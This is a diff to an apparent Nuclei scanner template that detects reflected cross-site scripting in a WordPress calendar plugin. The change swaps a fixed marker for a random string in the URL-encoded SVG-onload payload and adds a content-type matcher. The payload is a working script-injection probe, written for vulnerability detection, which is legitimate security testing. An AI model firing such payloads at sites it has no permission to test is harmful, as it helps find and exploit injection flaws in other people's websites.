--- a/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml
+++ b/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml
@@ -10,14 +10,20 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2FOPENBUGBOUNTY%2F)%3E'
+      - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E'
+
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<svg/onload=confirm(/NUCLEI/)>"
-        condition: and
+          - "<svg/onload=confirm(/{{randstr}}/)>"
         part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
       - type: status
         status:
           - 200
